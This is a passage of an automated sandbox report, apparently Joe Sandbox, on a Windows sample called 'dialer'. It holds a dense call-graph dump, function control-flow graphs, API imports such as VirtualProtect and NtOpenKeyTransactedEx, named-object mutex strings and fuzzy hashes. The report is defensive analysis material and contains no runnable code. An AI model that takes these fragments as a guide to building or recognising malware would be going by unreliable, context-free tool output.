2676->2675 2678 14000150d 2677->2678 2679 140001394 2 API calls 2678->2679 2680 140001512 2679->2680 2681 140001394 2 API calls 2680->2681 2682 140001521 2681->2682 2683 140001394 2 API calls 2682->2683 2684 140001530 2683->2684 2685 140001394 2 API calls 2684->2685 2686 14000153f 2685->2686 2687 140001394 2 API calls 2686->2687 2688 14000154e 2687->2688 2689 140001394 2 API calls 2688->2689 2690 14000155d 2689->2690 2691 140001394 2 API calls 2690->2691 2692 14000156c 2691->2692 2693 140001394 2 API calls 2692->2693 2694 14000157b 2693->2694 2695 140001394 2 API calls 2694->2695 2696 14000158a 2695->2696 2697 140001394 2 API calls 2696->2697 2698 140001599 2697->2698 2699 140001394 2 API calls 2698->2699 2700 1400015a8 2699->2700 2701 140001394 2 API calls 2700->2701 2702 1400015b7 2701->2702 2703 140001394 2 API calls 2702->2703 2704 1400015c6 2703->2704 2705 140001394 2 API calls 2704->2705 2706 1400015d5 2705->2706 2707 140001394 2 API calls 2706->2707 2708 1400015e4 2707->2708 2709 140001394 2 API calls 2708->2709 2710 1400015f3 2709->2710 2710->2347 2711 140001440 2710->2711 2712 140001394 2 API calls 2711->2712 2713 14000144f 2712->2713 2714 140001394 2 API calls 2713->2714 2715 14000145e 2714->2715 2716 140001394 2 API calls 2715->2716 2717 14000146d 2716->2717 2718 140001394 2 API calls 2717->2718 2719 14000147c 2718->2719 2720 140001394 2 API calls 2719->2720 2721 14000148b 2720->2721 2722 140001394 2 API calls 2721->2722 2723 14000149a 2722->2723 2724 140001394 2 API calls 2723->2724 2725 1400014a9 2724->2725 2726 140001394 2 API calls 2725->2726 2727 1400014b8 2726->2727 2728 140001394 2 API calls 2727->2728 2729 1400014c7 2728->2729 2730 140001394 2 API calls 2729->2730 2731 1400014d6 2730->2731 2732 1400014e5 2731->2732 2733 140001394 2 API calls 2731->2733 2734 140001394 2 API calls 2732->2734 2733->2732 2735 1400014ef 2734->2735 2736 1400014f4 2735->2736 2737 140001394 2 API calls 2735->2737 2738 140001394 2 API calls 2736->2738 2737->2736 2739 1400014fe 2738->2739 2740 140001503 2739->2740 2741 140001394 2 API calls 2739->2741 2742 140001394 2 API calls 2740->2742 2741->2740 2743 14000150d 2742->2743 2744 140001394 2 API calls 2743->2744 2745 140001512 2744->2745 2746 140001394 2 API calls 2745->2746 2747 140001521 2746->2747 2748 140001394 2 API calls 2747->2748 2749 140001530 2748->2749 2750 140001394 2 API calls 2749->2750 2751 14000153f 2750->2751 2752 140001394 2 API calls 2751->2752 2753 14000154e 2752->2753 2754 140001394 2 API calls 2753->2754 2755 14000155d 2754->2755 2756 140001394 2 API calls 2755->2756 2757 14000156c 2756->2757 2758 140001394 2 API calls 2757->2758 2759 14000157b 2758->2759 2760 140001394 2 API calls 2759->2760 2761 14000158a 2760->2761 2762 140001394 2 API calls 2761->2762 2763 140001599 2762->2763 2764 140001394 2 API calls 2763->2764 2765 1400015a8 2764->2765 2766 140001394 2 API calls 2765->2766 2767 1400015b7 2766->2767 2768 140001394 2 API calls 2767->2768 2769 1400015c6 2768->2769 2770 140001394 2 API calls 2769->2770 2771 1400015d5 2770->2771 2772 140001394 2 API calls 2771->2772 2773 1400015e4 2772->2773 2774 140001394 2 API calls 2773->2774 2775 1400015f3 2774->2775 2775->2347 2775->2356 2777 1400014e5 2776->2777 2778 140001394 2 API calls 2776->2778 2779 140001394 2 API calls 2777->2779 2778->2777 2780 1400014ef 2779->2780 2781 1400014f4 2780->2781 2782 140001394 2 API calls 2780->2782 2783 140001394 2 API calls 2781->2783 2782->2781 2784 1400014fe 2783->2784 2785 140001503 2784->2785 2786 140001394 2 API calls 2784->2786 2787 140001394 2 API calls 2785->2787 2786->2785 2788 14000150d 2787->2788 2789 140001394 2 API calls 2788->2789 2790 140001512 2789->2790 2791 140001394 2 API calls 2790->2791 2792 140001521 2791->2792 2793 140001394 2 API calls 2792->2793 2794 140001530 2793->2794 2795 140001394 2 API calls 2794->2795 2796 14000153f 2795->2796 2797 140001394 2 API calls 2796->2797 2798 14000154e 2797->2798 2799 140001394 2 API calls 2798->2799 2800 14000155d 2799->2800 2801 140001394 2 API calls 2800->2801 2802 14000156c 2801->2802 2803 140001394 2 API calls 2802->2803 2804 14000157b 2803->2804 2805 140001394 2 API calls 2804->2805 2806 14000158a 2805->2806 2807 140001394 2 API calls 2806->2807 2808 140001599 2807->2808 2809 140001394 2 API calls 2808->2809 2810 1400015a8 2809->2810 2811 140001394 2 API calls 2810->2811 2812 1400015b7 2811->2812 2813 140001394 2 API calls 2812->2813 2814 1400015c6 2813->2814 2815 140001394 2 API calls 2814->2815 2816 1400015d5 2815->2816 2817 140001394 2 API calls 2816->2817 2818 1400015e4 2817->2818 2819 140001394 2 API calls 2818->2819 2820 1400015f3 2819->2820 2820->2362 2822 140001394 2 API calls 2821->2822 2823 140001530 2822->2823 2824 140001394 2 API calls 2823->2824 2825 14000153f 2824->2825 2826 140001394 2 API calls 2825->2826 2827 14000154e 2826->2827 2828 140001394 2 API calls 2827->2828 2829 14000155d 2828->2829 2830 140001394 2 API calls 2829->2830 2831 14000156c 2830->2831 2832 140001394 2 API calls 2831->2832 2833 14000157b 2832->2833 2834 140001394 2 API calls 2833->2834 2835 14000158a 2834->2835 2836 140001394 2 API calls 2835->2836 2837 140001599 2836->2837 2838 140001394 2 API calls 2837->2838 2839 1400015a8 2838->2839 2840 140001394 2 API calls 2839->2840 2841 1400015b7 2840->2841 2842 140001394 2 API calls 2841->2842 2843 1400015c6 2842->2843 2844 140001394 2 API calls 2843->2844 2845 1400015d5 2844->2845 2846 140001394 2 API calls 2845->2846 2847 1400015e4 2846->2847 2848 140001394 2 API calls 2847->2848 2849 1400015f3 2848->2849 2849->2362 2851 140001394 2 API calls 2850->2851 2852 140001431 2851->2852 2853 140001394 2 API calls 2852->2853 2854 140001440 2853->2854 2855 140001394 2 API calls 2854->2855 2856 14000144f 2855->2856 2857 140001394 2 API calls 2856->2857 2858 14000145e 2857->2858 2859 140001394 2 API calls 2858->2859 2860 14000146d 2859->2860 2861 140001394 2 API calls 2860->2861 2862 14000147c 2861->2862 2863 140001394 2 API calls 2862->2863 2864 14000148b 2863->2864 2865 140001394 2 API calls 2864->2865 2866 14000149a 2865->2866 2867 140001394 2 API calls 2866->2867 2868 1400014a9 2867->2868 2869 140001394 2 API calls 2868->2869 2870 1400014b8 2869->2870 2871 140001394 2 API calls 2870->2871 2872 1400014c7 2871->2872 2873 140001394 2 API calls 2872->2873 2874 1400014d6 2873->2874 2875 1400014e5 2874->2875 2876 140001394 2 API calls 2874->2876 2877 140001394 2 API calls 2875->2877 2876->2875 2878 1400014ef 2877->2878 2879 1400014f4 2878->2879 2880 140001394 2 API calls 2878->2880 2881 140001394 2 API calls 2879->2881 2880->2879 2882 1400014fe 2881->2882 2883 140001503 2882->2883 2884 140001394 2 API calls 2882->2884 2885 140001394 2 API calls 2883->2885 2884->2883 2886 14000150d 2885->2886 2887 140001394 2 API calls 2886->2887 2888 140001512 2887->2888 2889 140001394 2 API calls 2888->2889 2890 140001521 2889->2890 2891 140001394 2 API calls 2890->2891 2892 140001530 2891->2892 2893 140001394 2 API calls 2892->2893 2894 14000153f 2893->2894 2895 140001394 2 API calls 2894->2895 2896 14000154e 2895->2896 2897 140001394 2 API calls 2896->2897 2898 14000155d 2897->2898 2899 140001394 2 API calls 2898->2899 2900 14000156c 2899->2900 2901 140001394 2 API calls 2900->2901 2902 14000157b 2901->2902 2903 140001394 2 API calls 2902->2903 2904 14000158a 2903->2904 2905 140001394 2 API calls 2904->2905 2906 140001599 2905->2906 2907 140001394 2 API calls 2906->2907 2908 1400015a8 2907->2908 2909 140001394 2 API calls 2908->2909 2910 1400015b7 2909->2910 2911 140001394 2 API calls 2910->2911 2912 1400015c6 2911->2912 2913 140001394 2 API calls 2912->2913 2914 1400015d5 2913->2914 2915 140001394 2 API calls 2914->2915 2916 1400015e4 2915->2916 2917 140001394 2 API calls 2916->2917 2918 1400015f3 2917->2918 2918->2362 2920 140001394 2 API calls 2919->2920 2921 140001440 2920->2921 2922 140001394 2 API calls 2921->2922 2923 14000144f 2922->2923 2924 140001394 2 API calls 2923->2924 2925 14000145e 2924->2925 2926 140001394 2 API calls 2925->2926 2927 14000146d 2926->2927 2928 140001394 2 API calls 2927->2928 2929 14000147c 2928->2929 2930 140001394 2 API calls 2929->2930 2931 14000148b 2930->2931 2932 140001394 2 API calls 2931->2932 2933 14000149a 2932->2933 2934 140001394 2 API calls 2933->2934 2935 1400014a9 2934->2935 2936 140001394 2 API calls 2935->2936 2937 1400014b8 2936->2937 2938 140001394 2 API calls 2937->2938 2939 1400014c7 2938->2939 2940 140001394 2 API calls 2939->2940 2941 1400014d6 2940->2941 2942 1400014e5 2941->2942 2943 140001394 2 API calls 2941->2943 2944 140001394 2 API calls 2942->2944 2943->2942 2945 1400014ef 2944->2945 2946 1400014f4 2945->2946 2947 140001394 2 API calls 2945->2947 2948 140001394 2 API calls 2946->2948 2947->2946 2949 1400014fe 2948->2949 2950 140001503 2949->2950 2951 140001394 2 API calls 2949->2951 2952 140001394 2 API calls 2950->2952 2951->2950 2953 14000150d 2952->2953 2954 140001394 2 API calls 2953->2954 2955 140001512 2954->2955 2956 140001394 2 API calls 2955->2956 2957 140001521 2956->2957 2958 140001394 2 API calls 2957->2958 2959 140001530 2958->2959 2960 140001394 2 API calls 2959->2960 2961 14000153f 2960->2961 2962 140001394 2 API calls 2961->2962 2963 14000154e 2962->2963 2964 140001394 2 API calls 2963->2964 2965 14000155d 2964->2965 2966 140001394 2 API calls 2965->2966 2967 14000156c 2966->2967 2968 140001394 2 API calls 2967->2968 2969 14000157b 2968->2969 2970 140001394 2 API calls 2969->2970 2971 14000158a 2970->2971 2972 140001394 2 API calls 2971->2972 2973 140001599 2972->2973 2974 140001394 2 API calls 2973->2974 2975 1400015a8 2974->2975 2976 140001394 2 API calls 2975->2976 2977 1400015b7 2976->2977 2978 140001394 2 API calls 2977->2978 2979 1400015c6 2978->2979 2980 140001394 2 API calls 2979->2980 2981 1400015d5 2980->2981 2982 140001394 2 API calls 2981->2982 2983 1400015e4 2982->2983 2984 140001394 2 API calls 2983->2984 2985 1400015f3 2984->2985 2985->2362

                                                        Callgraph

                                                        • Executed
                                                        • Not Executed
                                                        • Opacity -> Relevance
                                                        • Disassembly available
                                                        callgraph 0 Function_00000001400026E1 1 Function_00000001400031E1 2 Function_00000001400063E1 3 Function_0000000140001AE4 36 Function_0000000140001D40 3->36 81 Function_0000000140001BA0 3->81 4 Function_00000001400014E5 76 Function_0000000140001394 4->76 5 Function_00000001400010F0 6 Function_0000000140002FF0 61 Function_0000000140001370 6->61 7 Function_00000001400064F1 8 Function_00000001400062F1 9 Function_00000001400014F4 9->76 10 Function_0000000140001800 72 Function_0000000140002290 10->72 11 Function_0000000140002500 12 Function_0000000140003200 13 Function_0000000140001000 14 Function_0000000140001E00 13->14 44 Function_0000000140001750 13->44 87 Function_0000000140001FB0 13->87 94 Function_0000000140001FC0 13->94 15 Function_0000000140006900 35 Function_0000000140006640 15->35 16 Function_0000000140006401 17 Function_0000000140001503 17->76 18 Function_0000000140001404 18->76 19 Function_0000000140002104 20 Function_0000000140001E10 21 Function_0000000140006311 22 Function_0000000140001512 22->76 23 Function_0000000140006620 24 Function_0000000140003220 25 Function_0000000140002320 26 Function_0000000140002420 27 Function_0000000140001521 27->76 28 Function_0000000140006421 29 Function_0000000140001422 29->76 30 Function_0000000140001530 30->76 31 Function_0000000140006430 32 Function_0000000140001431 32->76 33 Function_0000000140006331 34 Function_000000014000153F 34->76 36->72 37 Function_0000000140001440 37->76 38 Function_0000000140001140 52 Function_0000000140001160 38->52 39 Function_0000000140003240 39->6 39->17 39->27 39->29 39->30 39->32 39->34 39->35 39->37 50 Function_000000014000145E 39->50 51 Function_0000000140002660 39->51 58 Function_000000014000156C 39->58 59 Function_000000014000146D 39->59 39->61 66 Function_000000014000157B 39->66 78 Function_0000000140001599 39->78 85 Function_00000001400015A8 39->85 86 Function_00000001400014A9 39->86 95 Function_00000001400016C0 39->95 102 Function_00000001400027D0 39->102 106 Function_00000001400014D6 39->106 40 Function_0000000140003141 41 Function_0000000140001F47 62 Function_0000000140001870 41->62 42 Function_0000000140002050 43 Function_0000000140006650 43->35 45 Function_0000000140001650 46 Function_0000000140002751 47 Function_0000000140006351 48 Function_0000000140006451 49 Function_000000014000155D 49->76 50->76 52->39 52->52 52->62 67 Function_0000000140001880 52->67 71 Function_0000000140001F90 52->71 52->95 53 Function_0000000140001760 107 Function_00000001400020E0 53->107 54 Function_0000000140002460 55 Function_0000000140003160 56 Function_0000000140006561 57 Function_0000000140001E65 57->62 58->76 59->76 60 Function_000000014000216F 63 Function_0000000140001A70 63->36 63->81 64 Function_0000000140002770 65 Function_0000000140006371 66->76 67->26 67->36 67->51 67->81 68 Function_0000000140003180 69 Function_0000000140006481 70 Function_0000000140006581 73 Function_0000000140002590 74 Function_0000000140002790 75 Function_0000000140002691 76->15 76->43 77 Function_0000000140002194 77->62 78->76 79 Function_000000014000219E 80 Function_0000000140001FA0 81->36 88 Function_00000001400023B0 81->88 101 Function_00000001400024D0 81->101 82 Function_00000001400027A0 83 Function_00000001400031A1 84 Function_00000001400063A1 85->76 86->76 89 Function_00000001400022B0 90 Function_00000001400026B0 91 Function_00000001400027B1 92 Function_00000001400064B1 93 Function_0000000140001AB3 93->36 93->81 96 Function_00000001400063C1 97 Function_00000001400065C1 98 Function_0000000140001AC3 98->36 98->81 99 Function_00000001400014C7 99->76 100 Function_0000000140001FD0 102->4 102->9 102->17 102->22 102->35 102->49 102->50 102->51 102->61 102->86 102->99 103 Function_00000001400017D0 104 Function_00000001400026D0 105 Function_0000000140001AD4 105->36 105->81 106->76 108 Function_00000001400017E0 108->107 109 Function_00000001400022E0

                                                        Executed Functions

                                                        Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • NtOpenKeyTransactedEx.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                        Memory Dump Source
                                                        • Source File: 00000041.00000002.2793358303.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000041.00000002.2793262142.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793499216.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793677289.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793804607.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: OpenTransacted
                                                        • String ID:
                                                        • API String ID: 1720269262-0
                                                        • Opcode ID: 547cd5761d4914845fa6ae388515c3c7ace98cea1eaf7b6cf35d4268a46e5783
                                                        • Instruction ID: 2cf5c700162fe594e1d2732e7ea8d53bfaf5a5c266b4abc5d19d3bc339ccaa33
                                                        • Opcode Fuzzy Hash: 547cd5761d4914845fa6ae388515c3c7ace98cea1eaf7b6cf35d4268a46e5783
                                                        • Instruction Fuzzy Hash: 22F09DB2608B408AEA12DB62F85179A77A5F38C7C0F009919BBD853735DB38C190CB40

                                                        Non-executed Functions

                                                        Function 00000001400027D0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 376COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 385 1400027d0-14000282b call 140002660 memset 388 140002831-14000283b 385->388 389 1400028fe-14000294e call 14000155d 385->389 391 140002864-14000286a 388->391 394 140002a43-140002a6b call 1400014c7 389->394 395 140002954-140002963 389->395 391->389 393 140002870-140002877 391->393 396 140002879-140002882 393->396 397 140002840-140002842 393->397 412 140002a76-140002ab8 call 140001503 call 140006640 memset 394->412 413 140002a6d 394->413 398 140002fa7-140002fe4 call 140001370 395->398 399 140002969-140002978 395->399 402 140002884-14000289b 396->402 403 1400028e8-1400028eb 396->403 400 14000284a-14000285e 397->400 404 1400029d4-140002a3e wcsncmp call 1400014e5 399->404 405 14000297a-1400029cd 399->405 400->389 400->391 408 1400028e5 402->408 409 14000289d-1400028b2 402->409 403->400 404->394 405->404 408->403 414 1400028c0-1400028c7 409->414 421 140002f39-140002f74 call 140001370 412->421 422 140002abe-140002ac5 412->422 413->412 415 1400028c9-1400028e3 414->415 416 1400028f0-1400028f9 414->416 415->408 415->414 416->400 425 140002ac7-140002afc 421->425 429 140002f7a 421->429 424 140002b03-140002b33 wcscpy wcscat wcslen 422->424 422->425 427 140002b35-140002b66 wcslen 424->427 428 140002b68-140002b95 424->428 425->424 430 140002b98-140002baf wcslen 427->430 428->430 429->424 431 140002bb5-140002bc8 430->431 432 140002f7f-140002f9b call 140001370 430->432 434 140002be5-140002eeb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 431->434 435 140002bca-140002bde 431->435 432->398 453 140002eed-140002f0b call 140001512 434->453 454 140002f10-140002f38 call 14000145e 434->454 435->434 453->454
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000041.00000002.2793358303.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000041.00000002.2793262142.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793499216.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793677289.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793804607.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: wcslen$memset$wcscatwcscpywcsncmp
                                                        • String ID: 0$X$\BaseNamedObjects\fmfuvuvubhulhbmi$`
                                                        • API String ID: 780471329-2221759706
                                                        • Opcode ID: b88068f1fe9cc8f588b577293ec80b011b8d976e1a7436dbacaa54201d0b1de5
                                                        • Instruction ID: 741ed5e485bbd100f929632303db2b81d3387a094c7d1780bec0f195da92c41a
                                                        • Opcode Fuzzy Hash: b88068f1fe9cc8f588b577293ec80b011b8d976e1a7436dbacaa54201d0b1de5
                                                        • Instruction Fuzzy Hash: 7F125AB2608BC481E762CB26F8443EAB7A4F789794F414215EBA957BF5DF78C189C700
                                                        Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000041.00000002.2793358303.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000041.00000002.2793262142.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793499216.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793677289.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793804607.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                        • String ID:
                                                        • API String ID: 2643109117-0
                                                        • Opcode ID: 9680da81ef9b41a8ca86ed20d1c3f39e20f6fb5cda03ac55c3df714a2b55688c
                                                        • Instruction ID: 04f373412a7efe9cc2b583252cf444471ad5a1af98637eab46a93e3fe04a9f05
                                                        • Opcode Fuzzy Hash: 9680da81ef9b41a8ca86ed20d1c3f39e20f6fb5cda03ac55c3df714a2b55688c
                                                        • Instruction Fuzzy Hash: C151F1F1611A4085FA16EF67F9947EA27A1AB8CBD0F449125FB4E873B2DE3884958700
                                                        Function 0000000140006650 Relevance: 13.7, APIs: 1, Strings: 8, Instructions: 185COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 458 140006650-14000666c 459 14000669b-1400066bf call 140006640 458->459 460 14000666e 458->460 465 1400068e6-1400068f8 459->465 467 1400066c5-1400066d9 call 140006640 459->467 461 140006675-14000667a 460->461 463 140006680-140006683 461->463 463->465 466 140006689-14000668f 463->466 466->463 468 140006691-140006696 466->468 471 1400066ef-140006701 467->471 468->465 472 1400066e3-1400066ed 471->472 473 140006703-14000671d call 140006640 471->473 472->471 474 140006745-140006748 472->474 478 14000671f-140006741 call 140006640 * 2 473->478 479 1400066e0 473->479 474->465 477 14000674e-14000677a call 140006640 malloc 474->477 483 1400068dc 477->483 484 140006780-140006782 477->484 478->472 491 140006743 478->491 479->472 483->465 484->483 486 140006788-1400067b8 call 140006640 * 2 484->486 494 1400067c0-1400067d7 486->494 491->477 495 1400068b3-1400068bb 494->495 496 1400067dd-1400067e3 494->496 499 1400068c6-1400068d4 495->499 500 1400068bd-1400068c0 495->500 497 140006832 496->497 498 1400067e5-140006803 call 140006640 496->498 503 140006837-140006879 call 140006640 * 2 497->503 507 140006810-14000682e 498->507 499->461 502 1400068da 499->502 500->494 500->499 502->465 511 1400068a8-1400068af 503->511 512 14000687b 503->512 507->507 509 140006830 507->509 509->503 511->495 513 140006880-14000688c 512->513 514 1400068a3 513->514 515 14000688e-1400068a1 513->515 514->511 515->513 515->514
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000041.00000002.2793358303.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000041.00000002.2793262142.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793499216.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793677289.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793804607.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: malloc
                                                        • String ID: \\a$!X\a$&X\a$>X\a$BX\a$FX\a$\BaseNamedObjects\prjkgwzjfpu$^X\a
                                                        • API String ID: 2803490479-1613850753
                                                        • Opcode ID: e16301037b0d77bcd467e7990bc76fc6cf491eb5b6aa7b9b1d04fdc29e4fd107
                                                        • Instruction ID: 9393264c7fefb4ea2be71b53204916b8babecb6f49fba4aadedb5818e0271d31
                                                        • Opcode Fuzzy Hash: e16301037b0d77bcd467e7990bc76fc6cf491eb5b6aa7b9b1d04fdc29e4fd107
                                                        • Instruction Fuzzy Hash: 0B719FB67106108BE756EF76A8107AA7792F34CBC8F048218FF0A673A5EB35D8418741
                                                        Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 557 140001ba0-140001bc0 558 140001bc2-140001bd7 557->558 559 140001c09 557->559 560 140001be9-140001bf1 558->560 561 140001c0c-140001c17 call 1400023b0 559->561 562 140001bf3-140001c02 560->562 563 140001be0-140001be7 560->563 567 140001cf4-140001cfe call 140001d40 561->567 568 140001c1d-140001c6c call 1400024d0 VirtualQuery 561->568 562->563 566 140001c04 562->566 563->560 563->561 569 140001cd7-140001cf3 memcpy 566->569 572 140001d03-140001d1e call 140001d40 567->572 568->572 575 140001c72-140001c79 568->575 576 140001d23-140001d38 GetLastError call 140001d40 572->576 577 140001c7b-140001c7e 575->577 578 140001c8e-140001c97 575->578 580 140001cd1 577->580 581 140001c80-140001c83 577->581 582 140001ca4-140001ccf VirtualProtect 578->582 583 140001c99-140001c9c 578->583 580->569 581->580 585 140001c85-140001c8a 581->585 582->576 582->580 583->580 586 140001c9e 583->586 585->580 587 140001c8c 585->587 586->582 587->586
                                                        APIs
                                                        • VirtualQuery.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                        • VirtualProtect.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                        • memcpy.MSVCRT ref: 0000000140001CE0
                                                        • GetLastError.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000041.00000002.2793358303.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000041.00000002.2793262142.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793499216.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793677289.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793804607.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                        • API String ID: 2595394609-2123141913
                                                        • Opcode ID: b222b55c204ee79bf3a6796a364817026853a656d4fde43e0f58adcb2d31a576
                                                        • Instruction ID: 5a1f3230e6b093fb794165155096e8c5f6a4272005de43de0888e77419c50878
                                                        • Opcode Fuzzy Hash: b222b55c204ee79bf3a6796a364817026853a656d4fde43e0f58adcb2d31a576
                                                        • Instruction Fuzzy Hash: E54132B1601A4486FA66DF57F884BE927A0F78DBC4F554126EF0E877B1DA38C586C700
                                                        Function 0000000140002104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 620 140002104-14000210b 621 140002111-140002128 EnterCriticalSection 620->621 622 140002218-140002221 620->622 625 14000220b-140002212 LeaveCriticalSection 621->625 626 14000212e-14000213c 621->626 623 140002272-140002280 622->623 624 140002223-14000222d 622->624 627 140002241-140002263 DeleteCriticalSection 624->627 628 14000222f 624->628 625->622 629 14000214d-140002159 TlsGetValue GetLastError 626->629 627->623 630 140002230-14000223f free 628->630 631 14000215b-14000215e 629->631 632 140002140-140002147 629->632 630->627 630->630 631->632 633 140002160-14000216d 631->633 632->625 632->629 633->632
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000041.00000002.2793358303.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000041.00000002.2793262142.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793499216.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793677289.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000041.00000002.2793804607.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                        • String ID:
                                                        • API String ID: 3326252324-0
                                                        • Opcode ID: 7fb37bf835227b833910ad0b3ca45fd1501cef95afb7d6058d68c1c103ef5548
                                                        • Instruction ID: 15eab80a9bed3770a061dd569a1ee204bed2693b300b41cb500e06475ae20a9f
                                                        • Opcode Fuzzy Hash: 7fb37bf835227b833910ad0b3ca45fd1501cef95afb7d6058d68c1c103ef5548
                                                        • Instruction Fuzzy Hash: 0821F5B1305A1192FA6BDB53F9483E823A4BB6CBD0F444121FF5A476B4DB79C986C300
                                                        Function 0000000140001E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 635 140001e10-140001e2d 636 140001e3e-140001e48 635->636 637 140001e2f-140001e38 635->637 639 140001ea3-140001ea8 636->639 640 140001e4a-140001e53 636->640 637->636 638 140001f60-140001f69 637->638 639->638 643 140001eae-140001eb3 639->643 641 140001e55-140001e60 640->641 642 140001ecc-140001ed1 640->642 641->639 644 140001f23-140001f2d 642->644 645 140001ed3-140001ee2 signal 642->645 646 140001eb5-140001eba 643->646 647 140001efb-140001f0a call 140006c00 643->647 650 140001f43-140001f45 644->650 651 140001f2f-140001f3f 644->651 645->644 648 140001ee4-140001ee8 645->648 646->638 652 140001ec0 646->652 647->644 656 140001f0c-140001f10 647->656 653 140001eea-140001ef9 signal 648->653 654 140001f4e-140001f53 648->654 650->638 651->650 652->644 653->638 657 140001f5a 654->657 658 140001f12-140001f21 signal 656->658 659 140001f55 656->659 657->638 658->638 659->657
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000041.00000002.2793358303.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
